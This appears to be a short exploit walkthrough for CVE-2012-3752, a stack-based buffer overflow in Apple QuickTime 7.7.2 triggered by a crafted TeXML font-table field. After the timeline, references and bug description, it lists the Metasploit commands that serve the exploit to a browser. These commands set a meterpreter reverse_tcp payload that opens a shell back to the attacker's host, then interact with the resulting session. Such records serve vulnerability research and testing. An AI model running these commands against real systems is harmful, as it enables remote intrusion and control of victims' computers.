Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0×31-0×39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo